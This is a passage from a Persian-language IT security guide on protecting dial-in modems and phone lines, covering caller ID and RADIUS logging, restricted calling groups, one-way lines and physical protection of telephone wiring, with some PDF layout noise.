‫ﺩﻭﺭ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﻭﻱ ‪ ISDN‬ﻣﻌﻤﻮﻟﻲ‪ ،ISDN PRI ،‬ﻭ ﻣﺪﺍﺭﻫﺎﻱ ‪ T1 Flex-Path‬ﻛﺎﺭ ﻛﻨﻨﺪ‪ ،‬ﺩﺍﺭﺍﻱ‬
‫ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ‪ ٢٤٠RADIUS‬ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﺮﺧﻼﻑ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ‬ ‫•‬
‫ﻋﺒﻮﺭ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺯﺩﻳﺪﻩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ‬
‫ﻣﻮﺍﺭﺩ ﻣﺸﺨﺺﻛﻨﻨﺪﺓ ﻣﻨﺒﻊ ﻭﺍﻗﻌﻲ ﺣﻤﻠﻪ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺷﻤﺎ ﻓﺎﻗﺪ ﻗﺎﺑﻠﻴﺖ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻤﺎﻥ ﺧﻂ ﻳﻚ ﻣﻮﺩﻡ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ‬ ‫•‬
‫ﻣﻮﺍﺯﻱ ﺑﺎ ﻣﻮﺩﻡ ﺍﻭﻝ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻧﮓ ﺳﻮﻡ ﻳﺎ ﭼﻬﺎﺭﻡ ﺑﻪ ﻣﻮﺩﻡ ﺍﻭﻝ ﭘﺎﺳﺦ ﺩﻫﺪ‪ ،‬ﻭ ﺍﺯ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺛﺎﻟﺚ ﻭ ﻣﻮﺩﻡ ﺩﻭﻡ ﺑﺮﺍﻱ ﺛﺒﺖ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺖ ﺭﺍ‬
‫ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺨﺼﻮﺹ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻛﻨﻴﺪ‪.‬‬
‫‪٢٤١‬‬
‫ﺳﻴﺴﺘﻢ ‪ ISDN‬ﻭ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺗﻠﻔﻨﻲ‪ ،‬ﻗﺎﺑﻠﻴﺖ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧﺎﻡ ﮔﺮﻭﻫﻬﺎﻱ ﺗﻤﺎﺱ ﻣﺤﺪﻭﺩ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ‬ ‫•‬
‫ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎ ﻣﺸﺨﺺ ﺳﺎﺯﻳﺪ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﻮﺩﻡ ﻫﺴﺘﻨﺪ ﻭ ﭘﺲ ﺍﺯ‬
‫ﻓﻌﺎﻝ ﺷﺪﻥ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ‪ ،‬ﺗﻤﺎﻡ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺴﺪﻭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪.‬‬

‫‪238 Call Forwarding‬‬


‫‪239 Caller-ID‬‬
‫‪ ۲۴۰‬ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺩﺭ ﺗﻤﺎﺱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )‪Remote Authentication Dial-In User Service‬؛ ‪ ،(RADIUS‬ﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ‬
‫ﭘﺎﻳﺎﻧﻪﺍﻱ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻠﻔﻨﻲ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺭﺍﻩ ﺩﻭﺭ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۱۳۸‬ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪241 Restricted Calling Groups‬‬
‫‪٣٨١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﭘﻴﺸﺮﻓﺘﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺮﺑﻨﺎﻱ ﺷﺒﻜﺔ ﺗﻠﻔﻨﻲ ﺧﻮﺩ ﺍﻣﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻠﻔﻨﻲ ﺷﺮﻛﺘﻬﺎ‬
‫ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻛﻪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻠﻔﻦ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﺭﺍ ﺧﻮﺩﺷﺎﻥ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ؛ ﻭ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﻛﻨﺘﺮﻝ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻲ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺑﮕﻴﺮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻫﺮ ﺷﻤﺎﺭﺓ‬
‫ﺩﻟﺨﻮﺍﻩ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻭﺭﺩ‪ ،‬ﻭ ﻟﺬﺍ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻗﺎﺩﺭ ﻫﺴﺘﻨﺪ ﺍﺯ ﺳﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻭ ﻳﺎ‬
‫ﮔﺮﻭﻫﻬﺎﻱ ﺗﻤﺎﺱ ﻣﺤﺪﻭﺩ ﻣﺘﻜﻲ ﺑﺎﺷﺪ ﻋﺒﻮﺭ ﻛﻨﻨﺪ‪.‬‬

‫ﻃﺮﺣﻬﺎﻱ ﻣﺪﺍﺧﻠﺔ ﻓﻴﺰﻳﻜﻲ‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﻣﻮﺩﻡ ﺑﻪ ﻳﻚ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭﺻﻞ ﻣﻲﺷﻮﺩ ﺗﺎ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻻﻥ ﻓﻨﻲ ﺧﺎﺭﺝ ﺍﺯ ﺍﺩﺍﺭﻩ ﺍﻣﻜﺎﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻓﺮﺍﻫﻢ‬
‫ﻛﻨﺪ‪ ،‬ﻣﻄﻤﺌﻨﹰﺎ ﺑﺎﻳﺪ ﺍﺯ ﻭﺻﻞ ﺷﺪﻥ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﻭ ﺗﻐﻴﻴﺮ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺧﻮﺩ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ‬
‫ﻭ ﻛﺎﺭﺁ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺧﻂ ﺗﻠﻔﻦ ﺭﺍ ﺍﺯ ﻣﻮﺩﻡ ﻗﻄﻊ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﻣﺴﺌﻮﻻﻥ ﻓﻨﻲ ﺑﻴﺮﻭﻥ ﺍﺩﺍﺭﻩ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﺷﺮﻭﻉ ﻛﺎﺭ ﺧﻮﺩ ﺑﺎ ﻣﺘﺼﺪﻱ‬
‫ﺗﻠﻔﻦ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ ﻭ ﺍﺯ ﺍﻭ ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺳﻴﻢ ﺗﻠﻔﻦ ﺭﺍ ﺑﻪ ﻣﻮﺩﻡ ﻭﺻﻞ ﻛﻨﺪ )ﻭ ﻳﺎ ﺣﺘﻲ ﺑﺼﻮﺭﺕ ﺑﺮﻋﻜﺲ‪ ،‬ﺗﺎ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ‬
‫ﺍﺟﺘﻤﺎﻋﻲ ﻛﺎﺳﺘﻪ ﺷﻮﺩ(‪ .‬ﺳﭙﺲ ﻣﺘﺼﺪﻱ ﺗﻠﻔﻦ‪ ،‬ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺭﺍ ﺑﻪ ﻣﻮﺩﻡ ﻭﺻﻞ ﻣﻲﻧﻤﺎﻳﺪ ﺗﺎ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﺘﻮﺍﻧﻨﺪ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ )ﻭ ﺍﻳﻨﻜﺎﺭ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﻓﺘﺮ ﺛﺒﺘﻬﺎ ﻣﻨﺪﺭﺝ ﻣﻲﺳﺎﺯﺩ( ﻭ ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡﺷﺪﻥ ﻛﺎﺭ ﻧﻴﺰ ﻣﺠﺪﺩﹰﺍ ﺳﻴﻢ ﺭﺍ ﺍﺯ ﻣﻮﺩﻡ ﻗﻄﻊ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻳﻜﻄﺮﻓﻪ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺩﺍﺭﺍﺕ‪ ،‬ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻫﻢ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺭﺍ ﺁﻏﺎﺯ ﻛﻨﻨﺪ ﻭ ﻫﻢ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﺗﻤﺎﺳﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻧﻈﺮ ﻳﻚ ﺭﻭﺵ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺣﺪﺍﻛﺜﺮ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ‬
‫ﺗﻠﻔﻦ ﺑﻴﺎﻳﺪ‪ ،‬ﺍﻣﺎ ﻣﺘﻀﻤﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺯﻳﺎﺩﻱ ﺍﺳﺖ‪ .‬ﺍﺯ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﺗﻮﺍﻧﺎﻳﻲ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ‬
‫ﺗﻤﺎﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻭ ﺍﻟﺒﺘﻪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﻪ ﺧﺮﺝ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﻭﻗﺘﻲ ﺭﻭﻱ ﻣﻮﺩﻡ‪ ،‬ﻫﻢ ﺁﻏﺎﺯ ﺗﻤﺎﺱ ﻭ ﻫﻢ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺗﻤﺎﺳﻬﺎﻱ‬
‫ﺩﺭﻳﺎﻓﺘﻲ ﻣﻤﻜﻦ ﺑﺎﺷﺪ‪ ،‬ﺩﺳﺘﻜﺎﺭﻱ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﻳﺎ ﺍﺷﻐﺎﻝ ﺧﻄﻮﻁ ﺗﻤﺎﺱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ‬
‫ﻛﻨﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺯ ﻣﻮﺩﻣﻬﺎﻱ ﺟﺪﺍﮔﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺗﻤﺎﺱ ﻭ ﺩﺭﻳﺎﻓﺖ ﺗﻤﺎﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺭﺗﻘﺎ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ‬
‫ﺍﺩﺍﺭﻩﻫﺎ ﻫﺰﻳﻨﺔ ﺑﺮﻗﺮﺍﺭﻱ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺍﺿﺎﻓﻪ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻛﺎﺭﺁﻳﻲ ﻭ ﺍﻣﻨﻴﺖ ﺁﻥ ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰ ﺍﺳﺖ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺧﻮﺩ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﺻﺤﺖ ﻧﻜﺎﺕ ﺯﻳﺮ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪:‬‬

‫•‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺩﺭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻛﻪ ﻗﺮﺍﺭ ﻧﻴﺴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺗﻤﺎﺳﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ‬
‫ﻼ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻋﺎﺩﻱ ﺷﻤﺎ ﻗﺎﺑﻠﻴﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺭﺍﻩ ﺩﻭﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻧﺪﺍﺭﺩ‪ .‬ﺷﺎﻳﺪ ﺍﺻ ﹰ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻧﻤﻲﺗﻮﺍﻥ ﺗﻤﺎﺳﻲ ﺑﺎ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‬ ‫•‬
‫ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺗﻤﺎﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﺓ ﻫﻴﭻ ﺗﻤﺎﺳﻲ ﺑﺎﺷﻨﺪ‪.‬‬ ‫•‬
‫"ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ" ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ ﺗﻠﻔﻦ‬


‫ﻻ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺍﻳﻤﻦ ﻛﺮﺩﻥ‬‫ﻫﺮﭼﻨﺪ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺭﻋﺎﻳﺖ ﻧﻜﺎﺕ ﺯﻳﺮ ﺭﺍ ﻫﺮﮔﺰ ﺍﺯ ﻳﺎﺩ ﻧﺒﺮﻳﺪ‪:‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨٢‬‬

‫ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‬


‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺷﻤﺎ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻤﺎﻡ ﺟﻌﺒﻪﺗﻘﺴﻴﻤﻬﺎ ﺭﺍ ﻗﻔﻞ ﻛﻨﻴﺪ ﻭ ﺳﻴﻤﻬﺎﻱ ﺗﻠﻔﻨﻲ ﺭﺍ ﺩﺭ ﺳﻴﻤﭙﻮﺷﻬﺎﻱ‬
‫ﻣﺨﺼﻮﺹ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺩﺭﻭﻥ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﺩﺭ ﻳﻚ ﻣﺤﻔﻈﺔ ﻗﻔﻠﺪﺍﺭ ﺑﺎﺷﺪ‪ .‬ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﺧﻂ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ‬
‫ﻓﻴﺰﻳﻜﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺩﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻛﻨﺪ ﻭ ﺗﻤﺎﺳﻬﺎﻱ ﺗﻠﻔﻨﻲ ﺷﻤﺎ ﺭﺍ ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺮﺳﻨﺪ ﺍﺯ ﺁﻥ ﺧﻮﺩ‬
‫ﻧﻤﺎﻳﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺎ ﮔﻤﺮﺍﻩ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺁﻧﻬﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠﺎﻱ ﺩﺯﺩﻳﺪﻥ‬
‫ﺗﻤﺎﺳﻬﺎﻱ ﺗﻠﻔﻨﻲ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻓﻘﻂ ﺗﺤﺖ ﻧﻈﺮ ﺑﮕﻴﺮﺩ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﺭﻭﻱ ﺁﻥ ﺧﻂ ﺗﻠﻔﻦ ﺍﺯ ﻫﺮ ﺩﻭ ﺳﻤﺖ ﺭﺍ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺑﺮﺍﻱ ﺧﻮﺩ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻬﺎﺟﻢ ﻧﻪﺗﻨﻬﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ‪ ،‬ﺑﻠﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﻤﺎﻡ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ‬
‫ﻛﺎﺭﺑﺮ ﺑﻪ ﺁﻧﻬﺎ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﺭﺍ ﺑﺪﺳﺖ ﺧﻮﺍﻫﺪ ﺁﻭﺭﺩ‪.‬‬

‫ﻲ ﻣﺨﺼﻮﺹ ﺩﺭﻳﺎﻓﺖ ﺗﻤﺎﺱ‪ ،‬ﺍﺟﺎﺯﺓ ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ ﺭﺍ ﻧﻤﻲﺩﻫﻨﺪ‬


‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻨ ﹺ‬
